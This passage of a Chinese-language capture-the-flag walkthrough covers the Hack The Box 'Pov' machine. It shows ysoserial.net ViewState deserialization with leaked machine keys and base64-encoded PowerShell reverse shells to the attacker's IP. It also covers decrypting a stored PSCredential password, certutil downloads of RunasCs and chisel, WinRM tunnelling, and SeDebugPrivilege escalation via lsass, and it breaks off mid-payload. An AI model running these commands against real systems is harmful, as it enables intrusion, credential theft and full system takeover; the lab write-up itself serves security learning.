2 0.000034000 10.10.14.87 → 10.129.230.183 ICMP 60 Echo (ping) reply id=0x0001, seq=1/256, ttl=64 (request in 1)
3 1.028914337 10.129.230.183 → 10.10.14.87 ICMP 60 Echo (ping) request id=0x0001, seq=2/512, ttl=127
4 1.028937737 10.10.14.87 → 10.129.230.183 ICMP 60 Echo (ping) reply id=0x0001, seq=2/512, ttl=64 (request in 3)
5 2.043117433 10.129.230.183 → 10.10.14.87 ICMP 60 Echo (ping) request id=0x0001, seq=3/768, ttl=127
6 2.043164534 10.10.14.87 → 10.129.230.183 ICMP 60 Echo (ping) reply id=0x0001, seq=3/768, ttl=64 (request in 5)
7 3.059031969 10.129.230.183 → 10.10.14.87 ICMP 60 Echo (ping) request id=0x0001, seq=4/1024, ttl=127
8 3.059070069 10.10.14.87 → 10.129.230.183 ICMP 60 Echo (ping) reply id=0x0001, seq=4/1024, ttl=64 (request in 7)
说明成功执行了我们的命令,修改命令为反弹shell
PS D:\tools\ysoserial_net> ./ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AOAA3ACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==" --path="/portfolio/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468"
4%2BR3bArUXKU%2FKGCVn5L%2F6Nb%2Bixtfvby5B3L0Mbvn2fu2GQxhhfKAcJCryK6%2BcDLFBwL1QfIb3wcdxXxz1SD608pSj33CAAtIKAvmtnMczq02WgGF5%2BsFQb6hNYXXQaR5Zsr5%2B6cBe5hdntzuJW%2BgodPy5WPdjD0xQ23xJ2mWH7qyGumE7UrTLt2j9KOODZ6HF%2F0dy%2FAAwQmO1rtIn7UjAwPNLD%2F38Hp7ooHgyYJ8%2Bd7TMW%2BvDepVrix3bYbLHpgvM5j50HFoeU%2BPFtUqyHb6sDT4cE%2Fs8R3rV75yG0t8GFnhU3Lo23H%2Ft1QVSShR3O9488yj6AKLFZxrlgDNK9HY5YbY7wfeP2I2KRpqaJXOyQkTlaIyH8b8H7AnRlyJOYnR5JvU5t3WJ0mwOKqeOpnH3xyIlWM%2Bin4Rtv1QLU9ctDVY5Tzf7XiC64OVDIitoTMtErwvcYey1ibJJAIcMv8Tzaw2SRsqDz05a1MZVVuoSdd0Q0k%2Fc3QWHkYwSz%2BjvslDhf4ptut%2Bp77dDb2p4kp1fWwRk%2BugImYclLN7BiNctqe6t7Qn5eKpWjxlA2myPALZOg72belofBaVTiemnspMdJeQUU5TDBrZOxL71PXM3seihUuxqW%2FSQ6HbN%2FFgjwcZ%2Firy4FZJXQ4wsM4J4zoZXPoZuDj%2FFvLyZGh4VRRgGIC4tFDHy9CjMQVVIxBiBCXQrkAdX5K0YBDkzm7GmRJRGG726zPpiiOoEHBFIyKt4%2BoxyouUtFG036HfAxGnW%2Fqr%2FqwPZrPdbNshX4fwRFRE%2BltFnny7eMGNt0WUQxS3UfOQC5n3iD%2FWPU23G%2BG194KYPVvuujuyW4iBaZ%2BtC%2BbXtHHHMyokIRLRZVthBaC69Bhe6d6XY%2FO7pTTuB5J%2FbB91s7GSstqGKaXEHFjl6YPEsj7tDJUFGvL%2FGdvRObUHXoht%2FXTZdg1voGSzcbQzm61lBNi0h91CuhuxJfPZufuTPDkDVAHysSQXfJnKSy6rmnEIqvAKf6nkoWjiWWeaB%2B0bds53zc1YkE8cpFqaovwp3exHl%2ByNgrx%2BVDQQdhPhVGRR8Hbp6Z%2BIpXOVb6W0kzfqBkV%2FYxNfTTy0g0A%2Bw%2FAax6ljToKh9IJV2M0CBWhpE8Pf7kYW8Fv99cmv151ccUjgOAnZ%2FAQkf7FHwn0Yuc%2FxkKXZhV6GA46rnZLonsst%2FgpvBvMJhQxEc%2B5elzzjFQfbdwjUu25fpjeWb7hsNlccb%2BUGuhF%2BwyqX2q2hUrbVa7KcnqFld%2B10nVXBJyPm4T4%2FSd8R58P36ZDLCfcpz9AiUJjRupuM7O6kFhTt5o1RzScYDcMx0vF8lYfjOsfrEoVRbRhOIVmSKfp1G%2ByUPRIqcWjtOtEY98p2SPgHCUU%2BSBpll%2B97RmOjTC5hI3Qls4o1sdVNRaEMmaCN830MtkHapmNHQouhJKllfWRgVg8JIrPwYmodXb7pLrOZ7NklDRP91KlRP3VFmHBuYnqUYPLuUTnp3ELhQrUdIgcHLFuR%2B9Vp%2FmQ8rC2hH%2BTJrSgjd9UwlwUU6Bqsq%2FZgwnBJtV319W2E37VI7hUSS%2FZNj3ljmRw%2FLNwv2rA2uZtBf3qO8qjdRxnZdSWXU0yOnoxD7T83iOtMAP5j%2BWqPkW%2FsCc4CWBBpMrJx0%2FqKKdIHffsBYz80PKgdNx%2BIbqGIAocHj6T7iJ7sjgovHvbgK%2BwpHuoXC3WJ5YxeVTlhg61YaAulNcLV%2BWARQixINcNVuKVbYRU5Bty%2Be9%2BB812gWEGJFiRXNAInYA89qf2jEfYHE6WfCiYHq9kTj1vgCkRimwqE6qEj1zMD1L5ge60o5asPkPJOzNVq2QBfNzPtEO7dKpChwYfX9qkpgfg%2B4V2zaqOamPZmYMJZqF%2F2xTWT2%2FshOX4w6wmA0ZC7HjSsLqybEQ0JaNp0uzpH0cXGHXLT%2FWZgDKfE5kOArkj1%2BuBs3VE6HIbu%2FjpYih2xIbXsvqpXtzz2qwwaBc0Y%2BZDRzUO43pv9H%2BW%2BYnDnBAR1HNGWKxKkUEUTNcvYsL9JL6ujzSSjRyiG%2FqIM06nkiyChgJUQZ5k%2FRLJl68Gqq4FosO53SBnD3KR7t4T1oWG944o51skF56xba6OtzbLOuukmTTv3spzRe4ZYU0mYcYmyRmPoSqw22HN7p8EI85eUrE2EzmYcDB8RlLLR5mHSDRB2Tj8CU68o6h5LGy3DZbUyzHvAASIcJ1RC1f%2FNRbUzUs8hcMiLC31t%2BUJXUjZLVPXBajV9UPb1sIQmPxgPuucq66Cu7Cb0xtjoJl5J9dtzwOKjRDH1JQiv%2BItJA36iV%2BIzA5kLcOchGI0CiRN0eZtKNOtajdtCMgPj3t0ir61dbodGGQXSQEDNopPmMwiSYG7ayj0qCpWR2D5SX%2BhsxCzFYr9HA6PTSqSC4t96mEMfO8t%2Ff7fuVXHr7SxiBd6za4B8ZOm1XoTTxQRSWZHV9bUyWC%2FBe8zlEV0fc13goSxwnPyCMrxYYoqkR4TqeKYsFCjPxj1P%2BSDFLL%2B6Re7SIhb5uwv0%2B3SemqDIScjptLrgy7N7EHhzGyQc9SqIBTcS8DWaC1o0rhnKPl%2BtWzEQtpA896trgfSs3ZXIbXW7bjwwNRrfrPcEpnpVmOAAUP3tICqtr4suHRR0metylPQK1Hv1eeteU9DG4iJslkSjaJdw8JNy9bDZFtzuICWnvSQMsZDHn9L9WCiLEy%2B97co%2FTDPsm4it%2BB3K5AYqnKuk4y7V%2FDjNt%2FFVTZfzFngWxUiUX2umE%2FkIZ9uEMtVnM%2F2hz1AT0aA8keGAN8meg9dowitqC3DC4iSkgtmG8hC7XA4EsTXATAdf4%2BlRGGe2UppGDJ8a%2BNBXgR%2FM%2Fmm2QGM6XgCbTY0El7S6ls%2BHbBN%2BCX3T8m7aPg%2F902qua9R5StcXhsNcamz1Gkgp4KATnZ2cF91xDR4g8V6u6AdQZ1pgYMhCATlzzr30Tm6fNdU%2FiyAg7lPw1b3V3Eac%2Bg%2F66JtyEDkxt6OKj783QtNB8Xjypd1YEQTek6nXqb15yflI2cnRr3KspRrrdg4qzMbJDzaygzxyufevNQl6cuOn5SwLt%2BYHYg%3D%3D
然后发送payload触发反序列化
POST /portfolio/default.aspx HTTP/1.1
Host: dev.pov.htb
Content-Length: 3571
Cache-Control: max-age=0
Origin: http://dev.pov.htb
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://dev.pov.htb/portfolio/default.aspx
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
__EVENTTARGET=download&__EVENTARGUMENT=&__VIEWSTATE=4%2BR3bArUXKU%2FKGCVn5L%2F6Nb%2Bixtfvby5B3L0Mbvn2fu2GQxhhfKAcJCryK6%2BcDLFBwL1QfIb3wcdxXxz1SD608pSj33CAAtIKAvmtnMczq02WgGF5%2BsFQb6hNYXXQaR5Zsr5%2B6cBe5hdntzuJW%2BgodPy5WPdjD0xQ23xJ2mWH7qyGumE7UrTLt2j9KOODZ6HF%2F0dy%2FAAwQmO1rtIn7UjAwPNLD%2F38Hp7ooHgyYJ8%2Bd7TMW%2BvDepVrix3bYbLHpgvM5j50HFoeU%2BPFtUqyHb6sDT4cE%2Fs8R3rV75yG0t8GFnhU3Lo23H%2Ft1QVSShR3O9488yj6AKLFZxrlgDNK9HY5YbY7wfeP2I2KRpqaJXOyQkTlaIyH8b8H7AnRlyJOYnR5JvU5t3WJ0mwOKqeOpnH3xyIlWM%2Bin4Rtv1QLU9ctDVY5Tzf7XiC64OVDIitoTMtErwvcYey1ibJJAIcMv8Tzaw2SRsqDz05a1MZVVuoSdd0Q0k%2Fc3QWHkYwSz%2BjvslDhf4ptut%2Bp77dDb2p4kp1fWwRk%2BugImYclLN7BiNctqe6t7Qn5eKpWjxlA2myPALZOg72belofBaVTiemnspMdJeQUU5TDBrZOxL71PXM3seihUuxqW%2FSQ6HbN%2FFgjwcZ%2Firy4FZJXQ4wsM4J4zoZXPoZuDj%2FFvLyZGh4VRRgGIC4tFDHy9CjMQVVIxBiBCXQrkAdX5K0YBDkzm7GmRJRGG726zPpiiOoEHBFIyKt4%2BoxyouUtFG036HfAxGnW%2Fqr%2FqwPZrPdbNshX4fwRFRE%2BltFnny7eMGNt0WUQxS3UfOQC5n3iD%2FWPU23G%2BG194KYPVvuujuyW4iBaZ%2BtC%2BbXtHHHMyokIRLRZVthBaC69Bhe6d6XY%2FO7pTTuB5J%2FbB91s7GSstqGKaXEHFjl6YPEsj7tDJUFGvL%2FGdvRObUHXoht%2FXTZdg1voGSzcbQzm61lBNi0h91CuhuxJfPZufuTPDkDVAHysSQXfJnKSy6rmnEIqvAKf6nkoWjiWWeaB%2B0bds53zc1YkE8cpFqaovwp3exHl%2ByNgrx%2BVDQQdhPhVGRR8Hbp6Z%2BIpXOVb6W0kzfqBkV%2FYxNfTTy0g0A%2Bw%2FAax6ljToKh9IJV2M0CBWhpE8Pf7kYW8Fv99cmv151ccUjgOAnZ%2FAQkf7FHwn0Yuc%2FxkKXZhV6GA46rnZLonsst%2FgpvBvMJhQxEc%2B5elzzjFQfbdwjUu25fpjeWb7hsNlccb%2BUGuhF%2BwyqX2q2hUrbVa7KcnqFld%2B10nVXBJyPm4T4%2FSd8R58P36ZDLCfcpz9AiUJjRupuM7O6kFhTt5o1RzScYDcMx0vF8lYfjOsfrEoVRbRhOIVmSKfp1G%2ByUPRIqcWjtOtEY98p2SPgHCUU%2BSBpll%2B97RmOjTC5hI3Qls4o1sdVNRaEMmaCN830MtkHapmNHQouhJKllfWRgVg8JIrPwYmodXb7pLrOZ7NklDRP91KlRP3VFmHBuYnqUYPLuUTnp3ELhQrUdIgcHLFuR%2B9Vp%2FmQ8rC2hH%2BTJrSgjd9UwlwUU6Bqsq%2FZgwnBJtV319W2E37VI7hUSS%2FZNj3ljmRw%2FLNwv2rA2uZtBf3qO8qjdRxnZdSWXU0yOnoxD7T83iOtMAP5j%2BWqPkW%2FsCc4CWBBpMrJx0%2FqKKdIHffsBYz80PKgdNx%2BIbqGIAocHj6T7iJ7sjgovHvbgK%2BwpHuoXC3WJ5YxeVTlhg61YaAulNcLV%2BWARQixINcNVuKVbYRU5Bty%2Be9%2BB812gWEGJFiRXNAInYA89qf2jEfYHE6WfCiYHq9kTj1vgCkRimwqE6qEj1zMD1L5ge60o5asPkPJOzNVq2QBfNzPtEO7dKpChwYfX9qkpgfg%2B4V2zaqOamPZmYMJZqF%2F2xTWT2%2FshOX4w6wmA0ZC7HjSsLqybEQ0JaNp0uzpH0cXGHXLT%2FWZgDKfE5kOArkj1%2BuBs3VE6HIbu%2FjpYih2xIbXsvqpXtzz2qwwaBc0Y%2BZDRzUO43pv9H%2BW%2BYnDnBAR1HNGWKxKkUEUTNcvYsL9JL6ujzSSjRyiG%2FqIM06nkiyChgJUQZ5k%2FRLJl68Gqq4FosO53SBnD3KR7t4T1oWG944o51skF56xba6OtzbLOuukmTTv3spzRe4ZYU0mYcYmyRmPoSqw22HN7p8EI85eUrE2EzmYcDB8RlLLR5mHSDRB2Tj8CU68o6h5LGy3DZbUyzHvAASIcJ1RC1f%2FNRbUzUs8hcMiLC31t%2BUJXUjZLVPXBajV9UPb1sIQmPxgPuucq66Cu7Cb0xtjoJl5J9dtzwOKjRDH1JQiv%2BItJA36iV%2BIzA5kLcOchGI0CiRN0eZtKNOtajdtCMgPj3t0ir61dbodGGQXSQEDNopPmMwiSYG7ayj0qCpWR2D5SX%2BhsxCzFYr9HA6PTSqSC4t96mEMfO8t%2Ff7fuVXHr7SxiBd6za4B8ZOm1XoTTxQRSWZHV9bUyWC%2FBe8zlEV0fc13goSxwnPyCMrxYYoqkR4TqeKYsFCjPxj1P%2BSDFLL%2B6Re7SIhb5uwv0%2B3SemqDIScjptLrgy7N7EHhzGyQc9SqIBTcS8DWaC1o0rhnKPl%2BtWzEQtpA896trgfSs3ZXIbXW7bjwwNRrfrPcEpnpVmOAAUP3tICqtr4suHRR0metylPQK1Hv1eeteU9DG4iJslkSjaJdw8JNy9bDZFtzuICWnvSQMsZDHn9L9WCiLEy%2B97co%2FTDPsm4it%2BB3K5AYqnKuk4y7V%2FDjNt%2FFVTZfzFngWxUiUX2umE%2FkIZ9uEMtVnM%2F2hz1AT0aA8keGAN8meg9dowitqC3DC4iSkgtmG8hC7XA4EsTXATAdf4%2BlRGGe2UppGDJ8a%2BNBXgR%2FM%2Fmm2QGM6XgCbTY0El7S6ls%2BHbBN%2BCX3T8m7aPg%2F902qua9R5StcXhsNcamz1Gkgp4KATnZ2cF91xDR4g8V6u6AdQZ1pgYMhCATlzzr30Tm6fNdU%2FiyAg7lPw1b3V3Eac%2Bg%2F66JtyEDkxt6OKj783QtNB8Xjypd1YEQTek6nXqb15yflI2cnRr3KspRrrdg4qzMbJDzaygzxyufevNQl6cuOn5SwLt%2BYHYg%3D%3D&__VIEWSTATEGENERATOR=8E0F0FA3&__EVENTVALIDATION=qgc030AAmAaTuLUVGlqD6MUknbiYTBleQNrCV8P2mbBUJewX2YmILbyTy8XiBdrFyNgD50fh4KpeC0CllQStSAzoJMQGoCz3KwgGajEuSXDdxe92qko%2FlXfKC1LmsDcvMthbfQ%3D%3D&file=\\10.10.14.87\shares
成功获取到shell
┌──(root㉿kali)-[~]
└─# rlwrap nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.87] from (UNKNOWN) [10.129.230.183] 49674
PS C:\windows\system32\inetsrv> whoami
pov\sfitz
PS C:\windows\system32\inetsrv>
1.5. connection.xml
查看 Users 目录,发现没有 user.txt
PS C:\users> tree . /f /a
Folder PATH listing
Volume serial number is 0899-6CAF
C:\USERS
+---.NET v4.5
+---.NET v4.5 Classic
+---Administrator
+---alaading
+---Public
| +---Documents
| +---Downloads
| +---Music
| +---Pictures
| \---Videos
\---sfitz
+---3D Objects
+---Contacts
+---Desktop
+---Documents
>>>> | connection.xml
|
+---Downloads
+---Favorites
| | Bing.url
| |
| \---Links
+---Links
| Desktop.lnk
| Downloads.lnk
|
+---Music
+---Pictures
+---Saved Games
+---Searches
\---Videos
可以发现有个 connection.xml 是比较可疑的
PS C:\users\sfitz\documents> type connection.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">alaading</S>
<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000cdfb54340c2929419cc739fe1a35bc88000000000200000000001066000000010000200000003b44db1dda743e1442e77627255768e65ae76e179107379a964fa8ff156cee21000000000e8000000002000020000000c0bd8a88cfd817ef9b7382f050190dae03b7c81add6b398b2d32fa5e5ade3eaa30000000a3d1e27f0b3c29dae1348e8adf92cb104ed1d95e39600486af909cf55e2ac0c239d4f671f79d80e425122845d4ae33b240000000b15cd305782edae7a3a75c7e8e3c7d43bc23eaae88fde733a28e1b9437d3766af01fdf6f2cf99d2a23e389326c786317447330113c5cfa25bc86fb0c6e1edda6</SS>
</Props>
</Obj>
</Objs>
这是一个alaading用户的 PSCredential 文件,对于这种文件的解密,要么使用DPAPI主密钥进行解密,要么直接在所有的上下文中使用命令进行读取、
读取方式参考:Windows Local Privilege Escalation - HackTricks
看下我们的上下文是否一致
PS C:\users\sfitz\documents> get-acl connection.xml
Directory: C:\users\sfitz\documents
Path Owner Access
---- ----- ------
>>>> connection.xml POV\sfitz NT AUTHORITY\SYSTEM Allow FullControl...
PS C:\users\sfitz\documents> whoami
>>>> pov\sfitz
很巧就是一致的,那我们可以直接读取
PS C:\users\sfitz\documents> $credential = Import-Clixml -Path connection.xml
PS C:\users\sfitz\documents> $credential.GetNetworkCredential().password
f8gQ8fynP44ek1m3
PS C:\users\sfitz\documents> $credential.GetNetworkCredential().username
alaading
获取到了账号密码,这里用 RunasCS 切换到这个账户
1.6. runasCS
首先下载文件
┌──(root㉿kali)-[~/Desktop/htb/pov]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.230.183 - - [11/Dec/2025 11:04:15] "GET /RunasCs.exe HTTP/1.1" 200 -
PS C:\users\public> certutil -f -split -urlcache http://10.10.14.87/RunasCs.exe
**** Online ****
0000 ...
ca00
CertUtil: -URLCache command FAILED: 0x80072ee2 (WinHttp: 12002 ERROR_WINHTTP_TIMEOUT)
CertUtil: The operation timed out
PS C:\users\public> PS C:\users\public> ls
Directory: C:\users\public
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 10/26/2023 2:27 PM Documents
d-r--- 9/15/2018 12:19 AM Downloads
d-r--- 9/15/2018 12:19 AM Music
d-r--- 9/15/2018 12:19 AM Pictures
d-r--- 9/15/2018 12:19 AM Videos
-a---- 12/11/2025 8:04 AM 51712 RunasCs.exe
然后用 alaading 用户权限反弹shell
PS C:\users\public> .\runascs.exe alaading f8gQ8fynP44ek1m3 cmd.exe -r 10.10.14.87:5555
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-85b98$\Default
[+] Async process 'C:\Windows\system32\cmd.exe' with pid 880 created in background.
PS C:\users\public>
┌──(root㉿kali)-[~/Desktop/htb/pov]
└─# rlwrap nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.10.14.87] from (UNKNOWN) [10.129.230.183] 49683
Microsoft Windows [Version 10.0.17763.5329]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
pov\alaading
C:\Users>tree . /f /a
tree . /f /a
Folder PATH listing
Volume serial number is 0899-6CAF
C:\USERS
+---.NET v4.5
+---.NET v4.5 Classic
+---Administrator
+---alaading
| +---3D Objects
| +---Contacts
| +---Desktop
>>>> | | user.txt
| |
| +---Documents
| +---Downloads
| +---Favorites
| | | Bing.url
| | |
| | \---Links
| +---Links
| | Desktop.lnk
| | Downloads.lnk
| |
| +---Music
| +---Pictures
| +---Saved Games
| +---Searches
| \---Videos
+---Public
| | RunasCs.exe
| |
| +---Documents
| +---Downloads
| +---Music
| +---Pictures
| \---Videos
\---sfitz
现在就有 user.txt了
C:\Users\alaading\Desktop>type user.txt
type user.txt
2cceb2fd24dbae9**********************
2. System
2.1. privilege
C:\Users\alaading\Desktop>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
>>>> SeDebugPrivilege Debug programs Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
这里发现存在 SeDebugPrivilege 这个用户特权是可以用于提权的,
Abusing Tokens - HackTricks
但是我们目前并没有被启用,我们通过 evil-winrm 登录来开启所有特权
2.2. evil-winrm
查看网络信息可以发现 5985端口是开放的 winrm服务也是正在运行的,但是外部却无法访问,这时候可以通过端口转发出来
C:\Users\alaading\Desktop>netstat -ano |findstr 5985
netstat -ano |findstr 5985
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP [::]:5985 [::]:0 LISTENING 4
C:\Users\alaading\Desktop>sc query winrm
sc query winrm
SERVICE_NAME: winrm
TYPE : 30 WIN32
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
这里用 chisel 把目标端口转发出来
C:\Users\alaading\Desktop>certutil -f -split -urlcache http://10.10.14.87/chisel.exe
certutil -f -split -urlcache http://10.10.14.87/chisel.exe
**** Online ****
000000 ...
a1ee00
CertUtil: -URLCache command completed successfully.
C:\Users\alaading\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 0899-6CAF
Directory of C:\Users\alaading\Desktop
12/11/2025 08:18 AM <DIR> .
12/11/2025 08:18 AM <DIR> ..
12/11/2025 08:18 AM 10,612,224 chisel.exe
12/11/2025 05:24 AM 34 user.txt
2 File(s) 10,612,258 bytes
2 Dir(s) 7,314,804,736 bytes free
#kali开启服务端
┌──(root㉿kali)-[~/Desktop/htb/pov]
└─# chisel server --reverse -p 8000
2025/12/11 11:23:52 server: Reverse tunnelling enabled
2025/12/11 11:23:52 server: Fingerprint Ba8AdxcEOyFROFNdLGmzd9gJAShvbksIdGkhIKhAe2M=
2025/12/11 11:23:52 server: Listening on http://0.0.0.0:8000
#客户端连接 并设置端口转发
C:\Users\alaading\Desktop>.\chisel.exe client 10.10.14.87:8000 R:5985:127.0.0.1:5985
.\chisel.exe client 10.10.14.87:8000 R:5985:127.0.0.1:5985
2025/12/11 08:24:43 client: Connecting to ws://10.10.14.87:8000
2025/12/11 08:24:43 client: Connected (Latency 70.2738ms)
#服务器显示客户端连接成功
┌──(root㉿kali)-[~/Desktop/htb/pov]
└─# chisel server --reverse -p 8000
2025/12/11 11:23:52 server: Reverse tunnelling enabled
2025/12/11 11:23:52 server: Fingerprint Ba8AdxcEOyFROFNdLGmzd9gJAShvbksIdGkhIKhAe2M=
2025/12/11 11:23:52 server: Listening on http://0.0.0.0:8000
2025/12/11 11:24:42 server: session#1: Client version (1.11.3) differs from server version (1.10.1-0kali1)
2025/12/11 11:24:42 server: session#1: tun: proxy#R:5985=>5985: Listening
此时访问本地的5985就是访问靶机的5985端口了,然后登录winrm
┌──(root㉿kali)-[~/Desktop/htb/pov]
└─# evil-winrm -i 127.0.0.1 -u alaading -p f8gQ8fynP44ek1m3
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\alaading\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
>>>> SeDebugPrivilege Debug programs Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
此时我们的 SeDebugPrivilege 权限就启用了
然后就可以美美提权了😋
┌──(root㉿kali)-[~/Desktop/htb/pov]
└─# wget https://raw.githubusercontent.com/decoder-it/psgetsystem/master/psgetsys.ps1
--2025-12-11 11:31:34-- https://raw.githubusercontent.com/decoder-it/psgetsystem/master/psgetsys.ps1
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 198.18.0.91
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|198.18.0.91|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5926 (5.8K) [text/plain]
Saving to: ‘psgetsys.ps1’
psgetsys.ps1 100%[==================================>] 5.79K --.-KB/s in 0.02s
2025-12-11 11:31:35 (354 KB/s) - ‘psgetsys.ps1’ saved [5926/5926]
上传 psgetsys.ps1脚本
*Evil-WinRM* PS C:\Users\alaading\Documents> upload psgetsys.ps1
Info: Uploading /root/Desktop/htb/pov/psgetsys.ps1 to C:\Users\alaading\Documents\psgetsys.ps1
Data: 7900 bytes of 7900 bytes copied
Info: Upload successful!
脚本的使用需要先获取一个存在且可信的父进程PID,这里我用 lsass
*Evil-WinRM* PS C:\Users\alaading\Documents> get-process lsass
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
919 23 5516 14964 1.27 636 0 lsass
#导入脚本
*Evil-WinRM* PS C:\Users\alaading\Documents> Import-Module .\psgetsys.ps1
#测试命令
ImpersonateFromParentPid -ppid 636 -command "C:\Windows\System32\cmd.exe" -cmdargs "/c whoami"
然后反弹shell
*Evil-WinRM* PS C:\Users\alaading\Documents> ImpersonateFromParentPid -ppid 636 -command "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -cmdargs "-e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AOAA3ACIALAA2ADYANgA2ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAA